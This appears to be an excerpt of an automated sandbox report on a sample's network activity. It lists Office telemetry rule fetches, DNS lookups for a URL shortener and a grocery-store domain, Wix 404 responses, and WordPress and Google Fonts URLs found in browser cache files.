Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: t.ly
Source: global trafficDNS traffic detected: DNS query: gardenfresheg.com.americanfoodeg.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: gardenfresheg.com
Source: global trafficDNS traffic detected: DNS query: www.gardenfresheg.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 2960Content-Type: text/html; charset=UTF-8Cache-Control: no-cacheX-Accel-Buffering: noContent-Language: en-USStrict-Transport-Security: max-age=86400Set-Cookie: XSRF-TOKEN=1731426071|w2lIPHb04GLH; Path=/; Domain=www.gardenfresheg.com; Secure; SameSite=NoneX-Wix-Request-Id: 1731426070.9761575373322882413Server: PepyakaX-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Tue, 12 Nov 2024 15:41:11 GMTX-Served-By: cache-dfw-kdfw8210098-DFWX-Cache: MISSVary: Accept-EncodingX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLhMmzknV1TfNKr21CODvg/uaplD64utOnGn2VMGhl2y8,SyyhSd/GJpnOwr8HB8ZFFqcKJ7iMPkLlyE/6thK4I68=,4EmzKGKKpFffqfFwZRPY8ZVV3HijRNdzA59Um8+v5am2KPhcwC3LU7GY1nMtE8zvi4KznDeOHsVWJbleGmzOhQ==Via: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: en-USStrict-Transport-Security: max-age=86400X-Wix-Request-Id: 1731426071.71624545349311439675Cache-Control: public,max-age=0,must-revalidateServer: PepyakaX-Content-Type-Options: nosniffAccept-Ranges: bytesAge: 0Date: Tue, 12 Nov 2024 15:41:11 GMTX-Served-By: cache-dfw-kdfw8210108-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_virginia-pub_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqMdbasEzJedGS3Ki75xXnAtFZnRrnvyqOEKpetNb+u3,2d58ifebGbosy5xc+FRalpycqC1rjJeyM0igIjXtAi87vzNeZ/8dq/fiKEm8Dxcpx48gfqrQcoINN2IAhyxCIQ==,2UNV7KOq4oGjA5+PKsX47EX4ArvKW2rSVXB8jSb0NZlBgoOYGa1MpluGPPjG4/Tb,/B3VgDtICCNDWQOEWfZmMgGlx2EGNjBt1mOARmme9gQ=,QCwmNx1TNUYLIqEqVA58OGrL5QIbbhdAZMtl9k/EvDUj6r0AZAMucqm4C7kwBEyaGbuDVMLC73nuBvy48N2uMw==Transfer-Encoding: chunkedVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: en-USStrict-Transport-Security: max-age=86400X-Wix-Request-Id: 1731426073.6171574372110879043X-Envoy-Upstream-Service-Time: 28Cache-Control: public,max-age=0,must-revalidateServer: PepyakaX-Content-Type-Options: nosniffAccept-Ranges: bytesAge: 0Date: Tue, 12 Nov 2024 15:41:13 GMTX-Served-By: cache-dfw-kdfw8210146-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_virginia-pub_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLsQfxK/4OJfMqFNoqj30vnQtFZnRrnvyqOEKpetNb+u3,2d58ifebGbosy5xc+FRaljSbm6PaHMoQN1r36ftI8Mqnq0OSObgIv7Lha1xzY5FZf3GT9uter9v+1vi3OZFsTA==,2UNV7KOq4oGjA5+PKsX47JyuBROT9i54+nG4R7p6sZ8xwy5Yb789UDkEfaJNWrtQ,/B3VgDtICCNDWQOEWfZmMhrajZZqXm0GZVbjkREVNHw=,QCwmNx1TNUYLIqEqVA58OFubz7nrauxKn5DXivcdVVAj6r0AZAMucqm4C7kwBEyaGkUsehRBdDpOTAXQWUerRQ==Transfer-Encoding: chunkedVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 2960Content-Type: text/html; charset=UTF-8Content-Language: en-USStrict-Transport-Security: max-age=86400Age: 33X-Wix-Request-Id: 1731426075.7832467454141425782Cache-Control: public,max-age=0,must-revalidateServer: PepyakaX-Wix-Request-Id: 1731426075.7832467454141425782X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Tue, 12 Nov 2024 15:41:15 GMTX-Served-By: cache-dfw-kdfw8210131-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=hit, varnish;desc=hit_miss, dc;desc=fastly_virginia-pub_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLpdEzMYKCp26gkPw6kWLDGFCPTwZfAOtG6c4e6CNbdc7,2d58ifebGbosy5xc+FRalsvvvRhDHkl4QmamNNXQWfzHLCXalq4Uhi7XtnaIvABb4VScU/RLDFuvDomIP5xCfViB5QmpRe2J37zq9nDD6cs=,2UNV7KOq4oGjA5+PKsX47EX4ArvKW2rSVXB8jSb0NZlBgoOYGa1MpluGPPjG4/TbVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/front/css/style.c
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/front/js/scripts.
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/variation-swatches-style/assets/css/frontend.css?ver=201
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/variation-swatches-style/assets/js/frontend.js?ver=20160
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/css/fonts.css?ver=6.4.3
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/css/frontend.css?ver=6.4.
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/js/frontend.js?ver=1.0.0
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/js/woo-ajax-add-to-cart.j
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/perfect-scrollbar/css/cus
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/perfect-scrollbar/css/per
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/perfect-scrollbar/js/perf
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.eot
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.eot?#iefix
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.svg#star
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.ttf
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.woff
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=8.
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=8.
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?v
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/plugins/wp-plugin-hostgator/vendor/newfold-labs/wp-module-patter
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/assets/css/grocery-store-common.css?ver=1.0
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/assets/js/grocery-store-woocommerce.js?ver=
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/assets/js/grocery-store.js?ver=1.0.0
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/style.css?ver=1.0.0
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/aos-next/aos.css?ver=2.0.0
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/aos-next/aos.js?ver=6.4.3
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/bootstrap/css/bootstrap.css?ver=4.0
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/bootstrap/js/bootstrap.js?ver=3.3.7
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/customselect.js?ver=6.4.3
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/icofont/icofont.css?ver=1.0.1
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/owl-carousel/assets/owl.carousel.cs
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/owl-carousel/owl.carousel.js?ver=6.
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/rd-navbar/css/rd-navbar.css?ver=2.2
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/rd-navbar/js/jquery.rd-navbar.js?ve
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/sticky-sidebar/jquery.sticky-sideba
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-content/themes/grocery-store/woocommerce.css?ver=1.0.0
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-includes/css/dashicons.min.css?ver=6.4.3
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-includes/js/thickbox/thickbox.css?ver=6.4.3
Source: chromecache_41.2.drString found in binary or memory: http://gardenfresheg.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105
Source: chromecache_41.2.drString found in binary or memory: https://api.w.org/
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aTnpF2V0EjZKUsrLc.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aTnpF2V0EjcKUs.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aTnpF2V0Ejf6UsrLc.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aTnpF2V0EjfqUsrLc.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Er24c5h5Y91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Er24c5k5Y9.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Er24c5nJY91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Er24c5nZY91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Erg4Y5h5Y91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Erg4Y5k5Y9.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Erg4Y5nJY91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Erg4Y5nZY91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Err4E5h5Y91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Err4E5k5Y9.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Err4E5nJY91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Err4E5nZY91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Ery4A5h5Y91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Ery4A5k5Y9.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Ery4A5nJY91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Ery4A5nZY91po.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1JlFc-K.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1xlFQ.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLGT9Z1JlFc-K.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJfecg.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJnecmNE.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)
Source: chromecache_42.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)
